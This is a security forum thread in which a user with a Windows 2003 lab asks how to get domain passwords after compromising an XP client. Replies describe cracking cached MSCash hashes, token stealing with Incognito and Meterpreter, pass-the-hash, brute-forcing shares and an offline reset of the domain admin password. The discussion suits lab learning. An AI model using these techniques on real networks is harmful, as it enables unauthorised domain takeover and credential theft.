Hi there,

I have been trying to expand my knowledge, so I have set a lab with the following configuration:

Fully Patched Windows 2003 Server (Acting as a domain controller)
Unpatched Client Machine (XP), which is joined to the above domain.

Since I have been able to compromise the client machine, I was able to get the local hashes, and have been able to crack them using rainbow tables. My question is there any possible way to get Domain Passwords.

I have read about "CacheDump" tool, which will get the hashes for the last 10 logged in users (something called MSCash), and have been able to get the hashes. However, seems that these hashes cannot be cracked using rainbow table, as they came in the following format:
username:hash(32 chacter):domain:FQDN

So any idea on the above scenario ?

Thanks alot in advance,

have read about "CacheDump" tool, which will get the hashes for the last 10 logged in users (something called MSCash), and have been able to get the hashes. However, seems that these hashes cannot be cracked using rainbow table, as they came in the following format:

You do know that these passwords are much more secure than the LM hashes stored in the SAM file, for starters each of the cached hashes has its own salt added which will make them much more time consuming to crack. I do not know about rainbow tables but they can at least be cracked using John the ripper, here is a good tutorial on this from Irongeek:
http://www.irongeek.com/i.php?page=security/cachecrack

You can also use Cain to crack Cache dump passwords. However, I wouldnt give up on the LM hashes. Does your local admin password on the client work on the server? Do any of the user accounts give you access to the server? Try this:
http://forums.remote-exploit.org/showthread.php?t=12942

William

You can also use Cain to crack Cache dump passwords. However, I wouldnt give up on the LM hashes. Does your local admin password on the client work on the server? Do any of the user accounts give you access to the server? Try this:
http://forums.remote-exploit.org/showthread.php?t=12942

William

Thanks for the reply. Local Admin password doesn't give me access to the server, nor any users passwords give me access to the server. I am thinking of some sort of privilige escalation (if possible), also I will give a try to john the ripper to crack the m$ cache hashes.

Thanks for the reply. Local Admin password doesn't give me access to the server, nor any users passwords give me access to the server. I am thinking of some sort of privilige escalation (if possible), also I will give a try to john the ripper to crack the m$ cache hashes.

John works well for any password cracking. Cain, albeit slower, also has great cracking abilities for cached passwords, and a rather attractive (in comparison) GUI, if you want to go that route.

Essentially, I'm just repeating what has already been said. Let us now if you have any problems.

Your best bet is going to be token stealing. Incognitio has been built into meterpreter or you can upload the pass the hash toolkit from core.

Any domain users that have logged into the box since reboot, their tokens should be in memory. Once you are local admin or system on the box you can use one of the token passing tool to take that token and become the domain user (hopefully some sort of admin--which wouldnt be too far fetched if you are any sort of server).

I did a couple blog posts on the different tools.
http://carnal0wnage.blogspot.com/search/label/token%20kidnaping
http://carnal0wnage.blogspot.com/search/label/pass%20the%20hash

Your best bet is going to be token stealing. Incognitio has been built into meterpreter or you can upload the pass the hash toolkit from core.

Any domain users that have logged into the box since reboot, their tokens should be in memory. Once you are local admin or system on the box you can use one of the token passing tool to take that token and become the domain user (hopefully some sort of admin--which wouldnt be too far fetched if you are any sort of server).

I did a couple blog posts on the different tools.
http://carnal0wnage.blogspot.com/search/label/token%20kidnaping
http://carnal0wnage.blogspot.com/search/label/pass%20the%20hash

Nioce post on incognitio. I'm assuming your one of the guys from LSO so I just wanted to welcome you to the forums if I had not done so already:)

Your best bet is going to be token stealing. Incognitio has been built into meterpreter or you can upload the pass the hash toolkit from core.

Any domain users that have logged into the box since reboot, their tokens should be in memory. Once you are local admin or system on the box you can use one of the token passing tool to take that token and become the domain user (hopefully some sort of admin--which wouldnt be too far fetched if you are any sort of server).

I did a couple blog posts on the different tools.
http://carnal0wnage.blogspot.com/search/label/token%20kidnaping
http://carnal0wnage.blogspot.com/search/label/pass%20the%20hash

Great topics, I will give them a try :)

Thanks alot,

thank pureh@te! been lurking here and the IRC chan.

good to be here.

I once was pentested a network where a local administrator password was the same as the domein administrator password.

If the client connects to the fully patched server you can look for share's and try to Brute force them so you could get some network accouns.

If you have the time a sniffer could do the job.

Thanks for the links __CG__ , very interesting read. Thanks!

Kraven666

Well, I suppose this is not entirely relevant, but I learned a neat trick in college when a friend was working on his server 2003 project and forgot the domain controller password. We of course had physical access to the machine, which is not an entirely realistic situation but hey, the guy wanted access to his project and i thought it was kinda cool.

The method was pretty basic, start the machine in Directory service mode which disables active directory. Once active directory is disabled log onto the machine locally which is doable if your crafty enough, once you are in the local machine you essentially create a service that will reset your domain password by running a registry key. The whole process is kinda nifty and useful if your messing around with server and forget your password, but it also puts stress on the importance of physical protection of your machine, which I see neglected far too often. xxx.petri.co.il/reset_domain_admin_password_in_windows_server_2003 _ad.htm

www.petri.co.il/reset_domain_admin_password_in_windows_server_2003 _ad.htm gives a 404 error.